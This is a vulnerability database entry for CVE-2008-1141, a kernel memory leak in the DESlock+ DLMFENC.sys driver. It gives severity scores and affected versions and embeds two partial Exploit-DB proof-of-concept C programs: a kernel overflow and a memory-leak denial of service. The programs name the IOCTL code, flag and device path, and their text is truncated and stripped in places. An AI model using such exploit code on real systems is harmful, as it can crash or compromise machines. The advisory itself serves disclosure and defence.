CVE-2008-1141
published 2008-03-04CVE-2008-1141: Memory leak in DLMFENC.sys 1.0.0.26 in DESlock+ 3.2.6 and earlier allows local users to cause a denial of service (kernel memory consumption) via a series of…
PriorityP414medium4.9CVSS 2.0
AVLACLAuNCNINAC
EXPLOIT
EPSS
0.91%
55.4th percentile
Memory leak in DLMFENC.sys 1.0.0.26 in DESlock+ 3.2.6 and earlier allows local users to cause a denial of service (kernel memory consumption) via a series of DLMFENC_IOCTL requests to \\.\DLKPFSD_Device that allocate "link list structures."
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| deslock | deslock | <= 3.2.6 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
DESlock+ < 3.2.7 - Local Kernel Overflow (PoC)
exploitdb·2008-09-20
CVE-2008-1141 DESlock+ < 3.2.7 - Local Kernel Overflow (PoC)
DESlock+
*
* DESlock+
#include
#include
#define DLMFENC_IOCTL 0x0FA4204C
#define DLMFENC_FLAG 0xC001D00D
#define DLMFENC_BUZ_SZ 0x1000
#define ARG_SIZE(a) ((a-(sizeof (int)*2))/sizeof (void *))
struct ioctl_req {
int flag;
int req_num;
void *arg[ARG_SIZE(0x20)];
};
static void
xor_mask_req (struct ioctl_req *req)
{
DWORD i, pid;
PCHAR ptr;
pid = GetCurrentProcessId ();
for (i = 0, ptr = (PCHAR) req; i \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
fflush (stdout);
hFile = CreateFileA ("\\\\.\\DLKPFSD_Device", FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}
buf[0] = 'C'; /* drive letter */
memset (&buf[1], 0x41, sizeof buf -
Exploit-DB
DESlock+ < 3.2.6 - 'LIST' Local Kernel Memory Leak
exploitdb·2008-02-18
CVE-2008-1141 DESlock+ < 3.2.6 - 'LIST' Local Kernel Memory Leak
DESlock+
*
* DESlock+
#include
#include
#define DLMFENC_IOCTL 0x0FA4204C
#define DLMFENC_FLAG 0xC001D00D
#define ARG_SIZE(a) ((a-(sizeof (int)*2))/sizeof (void *))
struct ioctl_req {
int flag;
int req_num;
void *arg[ARG_SIZE(0x20)];
};
static void
xor_mask_req (struct ioctl_req *req)
{
DWORD i, pid;
PCHAR ptr;
pid = GetCurrentProcessId ();
for (i = 0, ptr = (PCHAR) req; i \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
hFile = CreateFileA ("\\\\.\\DLKPFSD_Device", FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}
memset (&req, 0, sizeof req);
for (i = 0; i <= UINT_MAX; i++)
{
req.flag = DLMFENC_FLAG;
req.req_num = 0x03;
req.a
No writeups or analysis indexed.
2008-03-04
Published